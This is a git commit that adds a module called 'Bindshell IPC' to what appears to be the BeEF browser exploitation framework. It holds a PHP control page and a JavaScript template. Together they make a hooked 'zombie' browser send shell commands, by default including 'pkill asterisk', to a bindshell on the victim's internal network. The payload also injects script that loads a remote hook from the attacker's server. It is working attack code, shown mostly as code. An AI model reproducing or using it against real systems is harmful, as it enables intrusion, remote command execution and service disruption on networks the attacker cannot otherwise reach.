Initial Import
git-svn-id: https://beef.googlecode.com/svn/trunk@2 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
This commit is contained in:
wade@bindshell.net
61
modules/network/bindshell_ipc/index.php
Normal file
61
modules/network/bindshell_ipc/index.php
Normal file
@@ -0,0 +1,61 @@
|
||||
<?
|
||||
// Copyright (c) 2006-2009, Wade Alcorn
|
||||
// All Rights Reserved
|
||||
// wade@bindshell.net - http://www.bindshell.net
|
||||
|
||||
require_once("../../../include/common.inc.php"); // included for get_b64_file()
|
||||
DEFINE('JS_FILE', './template.js');
|
||||
?>
|
||||
|
||||
<script>
|
||||
var rtnval = "OK Clicked";
|
||||
|
||||
Element.Methods.construct_code = function() {
|
||||
|
||||
// javascript is loaded from a file - it could be hard coded
|
||||
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
|
||||
|
||||
var temp_cmds = document.myform.cmd_str.value;
|
||||
temp_cmds = temp_cmds.replace(/\n/g, "\\n")
|
||||
|
||||
// replace sections of the code with user input
|
||||
b64code = b64replace(b64code, "IP_ADDRESS", document.myform.ip_str.value);
|
||||
b64code = b64replace(b64code, "PORT", document.myform.port_str.value);
|
||||
b64code = b64replace(b64code, "COMMAND", temp_cmds);
|
||||
|
||||
// send the code to the zombies
|
||||
do_send(b64code);
|
||||
}
|
||||
|
||||
// add construct code to DOM
|
||||
Element.addMethods();
|
||||
</script>
|
||||
|
||||
<!-- PAGE CONTENT -->
|
||||
<div id="module_header">Bindshell (Inter-protocol Communication)</div>
|
||||
|
||||
<div class="entry">
|
||||
Using <a href=http://www.bindshell.net/papers/ipc>Inter-protocol Communication</a> the
|
||||
zombie browser will send commands to a listening bindshell. The target address can be
|
||||
on the zombie's subnet which is potentially not directly accessible from the Internet.
|
||||
</div>
|
||||
|
||||
<div id="module_subsection">
|
||||
<form name="myform">
|
||||
<div id="module_subsection_header">Target Address</div>
|
||||
<input type="text" name="ip_str" value="localhost"/>
|
||||
<div id="module_subsection_header">Port</div>
|
||||
<input type="text" name="port_str" value="4444"/>
|
||||
<div id="module_subsection_header">Commands</div>
|
||||
note: the semicolons and exit command are required
|
||||
<textarea name="cmd_str" rows="5" cols="80">id;ls /;pwd;
|
||||
pkill asterisk;
|
||||
exit;
|
||||
</textarea>
|
||||
<input class="button" type="button" value=" Send Now " onClick="javascript:construct_code()"/>
|
||||
</form>
|
||||
</div>
|
||||
|
||||
|
||||
|
||||
|
||||
1
modules/network/bindshell_ipc/name.txt
Normal file
1
modules/network/bindshell_ipc/name.txt
Normal file
@@ -0,0 +1 @@
|
||||
Bindshell IPC
|
||||
89
modules/network/bindshell_ipc/template.js
Normal file
89
modules/network/bindshell_ipc/template.js
Normal file
@@ -0,0 +1,89 @@
|
||||
var target_ip = 'IP_ADDRESS';
|
||||
var target_port = '220';
|
||||
var payload = "";
|
||||
|
||||
var scr_l = '<scr' + 'ipt\>';
|
||||
var scr_r = '</scr' + 'ipt>';
|
||||
var max_line_len = 23;
|
||||
|
||||
payload += "ls\\\n";
|
||||
|
||||
function add_line(cmd) {
|
||||
payload += "echo -n '" + scr_l + "'\\\n";
|
||||
payload += "echo " + cmd + "\\\n";
|
||||
payload += "echo '" + scr_r + "'\\\n";
|
||||
}
|
||||
|
||||
function add_echo(cmd) {
|
||||
payload += "echo " + "\\\"" + cmd + "\\\"" + "\\\n";
|
||||
}
|
||||
|
||||
function construct_js(js) {
|
||||
add_line("a=''");
|
||||
|
||||
js = js.replace(/ /g, "SP")
|
||||
|
||||
//for(i=0; i<js.length; i+=max_line_len) {
|
||||
// add_line("a+=\\\""+js.substring(i,i+max_line_len)+"\\\"");
|
||||
//}
|
||||
|
||||
add_line("\\\"" + js +"\\\"");
|
||||
|
||||
add_line("s=String.fromCharCode(0x20)");
|
||||
add_line("a=a.replace(/SP/g,s)");
|
||||
}
|
||||
|
||||
var code = "";
|
||||
function add_js(js) {
|
||||
code+=js+";";
|
||||
}
|
||||
|
||||
//payload+=String.fromCharCode(0x12);
|
||||
//payload+=String.fromCharCode(0x13);
|
||||
|
||||
//payload += "fi\\\n";
|
||||
|
||||
add_echo(scr_l);
|
||||
add_echo("var result_id='" + result_id + "'");
|
||||
add_echo("function include(script_filename) {");
|
||||
add_echo("var html_doc = document.getElementsByTagName('head').item(0);");
|
||||
add_echo("var js = document.createElement('script');");
|
||||
add_echo("js.src = script_filename;");
|
||||
add_echo("js.type = 'text/javascript';");
|
||||
add_echo("js.defer = true;");
|
||||
add_echo("html_doc.appendChild(js);");
|
||||
add_echo("return js;");
|
||||
add_echo("}");
|
||||
add_echo("include('" + beef_url + "' + '/hook/ipc_bindshell.js.php');");
|
||||
add_echo("//__END__");
|
||||
add_echo(scr_r);
|
||||
|
||||
payload += "COMMAND";
|
||||
|
||||
var iframe = document.createElement("iframe");
|
||||
iframe.setAttribute("id","iwindow");
|
||||
//iframe.setAttribute("style", "visibility:hidden;");
|
||||
document.body.appendChild(iframe);
|
||||
|
||||
function do_submit(ip, port, content) {
|
||||
myform=document.createElement("form");
|
||||
myform.setAttribute("name","data");
|
||||
myform.setAttribute("method","post");
|
||||
myform.setAttribute("enctype", "multipart/form-data");
|
||||
|
||||
myform.setAttribute("action","http://" + ip +
|
||||
":" + PORT + '/abc.html;sh;');
|
||||
//":" + PORT + "/abc.html");
|
||||
document.getElementById("iwindow").contentWindow.document.body.appendChild(myform);
|
||||
|
||||
myExt = document.createElement("INPUT");
|
||||
myExt.setAttribute("id","extNo");
|
||||
myExt.setAttribute("name","test");
|
||||
myExt.setAttribute("value",content);
|
||||
myform.appendChild(myExt);
|
||||
|
||||
myform.submit();
|
||||
}
|
||||
|
||||
do_submit(target_ip, target_port, payload);
|
||||
|
||||
Reference in New Issue
Block a user